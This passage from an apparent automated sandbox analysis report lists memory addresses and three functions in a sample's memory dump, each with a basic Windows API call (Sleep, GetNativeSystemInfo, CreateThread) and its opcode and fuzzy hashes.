                                                                                                                                                                                                                  0x020f2434
                                                                                                                                                                                                                  0x020f2434
                                                                                                                                                                                                                  0x020f2439
                                                                                                                                                                                                                  0x020f243f
                                                                                                                                                                                                                  0x020f244d
                                                                                                                                                                                                                  0x020f244d
                                                                                                                                                                                                                  0x020f244d
                                                                                                                                                                                                                  0x020f2512
                                                                                                                                                                                                                  0x020f2528
                                                                                                                                                                                                                  0x020f2450
                                                                                                                                                                                                                  0x020f2454
                                                                                                                                                                                                                  0x020f2456
                                                                                                                                                                                                                  0x020f245a
                                                                                                                                                                                                                  0x020f2460
                                                                                                                                                                                                                  0x020f2468
                                                                                                                                                                                                                  0x020f246e
                                                                                                                                                                                                                  0x020f2472
                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                  0x020f2474
                                                                                                                                                                                                                  0x020f2482
                                                                                                                                                                                                                  0x020f248c
                                                                                                                                                                                                                  0x020f249d
                                                                                                                                                                                                                  0x020f249f
                                                                                                                                                                                                                  0x020f24a4
                                                                                                                                                                                                                  0x020f24a7
                                                                                                                                                                                                                  0x020f24b0
                                                                                                                                                                                                                  0x020f24bf
                                                                                                                                                                                                                  0x020f24c1
                                                                                                                                                                                                                  0x020f24cc
                                                                                                                                                                                                                  0x020f24d2
                                                                                                                                                                                                                  0x020f24d7
                                                                                                                                                                                                                  0x020f24db
                                                                                                                                                                                                                  0x020f24e0
                                                                                                                                                                                                                  0x020f24e2
                                                                                                                                                                                                                  0x020f24f0
                                                                                                                                                                                                                  0x020f24f0
                                                                                                                                                                                                                  0x020f24fc
                                                                                                                                                                                                                  0x020f2501
                                                                                                                                                                                                                  0x020f2504
                                                                                                                                                                                                                  0x020f250d
                                                                                                                                                                                                                  0x020f250d
                                                                                                                                                                                                                  0x020f2504
                                                                                                                                                                                                                  0x020f24cc
                                                                                                                                                                                                                  0x020f24bf
                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                  0x020f24a7

                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000005.00000002.2130490322.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: true
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                                                                                  • Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                                  • Instruction ID: 9e9a1d5383c57414d7c2510ad25738ccee8ee79360a0855224cf0f499646a908
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89218C72380B408AEBA0DFB1E9543D973A2E788B88F4844269F4D57E58EF38D509D750
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 020F260C, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,020F1E13), ref: 020F264B
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000005.00000002.2130490322.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: true
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: InfoNativeSystem
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1721193555-0
                                                                                                                                                                                                                  • Opcode ID: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                                  • Instruction ID: 311b7ef22b88fac3abe76d50761329b3f499d859d169c0b7d7cb36464fb44e29
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8FE06D226A0741C2DBA5EB20E9583993361FB84704F8801328A4E42E64EF2CC65DDB04
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 020F1000, Relevance: 1.5, APIs: 1, Instructions: 13threadCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000005.00000002.2130490322.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: true
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2422867632-0
                                                                                                                                                                                                                  • Opcode ID: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                                  • Instruction ID: 4774031dd4719876116e587ee78284fa7240de38311aabcae9e5f2e37baa1d2c
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67D0A972E10380C3E7B0CB20EB1AB9A6361F3E4319F808226CA4E44D64CF7CC158CA00
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Non-executed Functions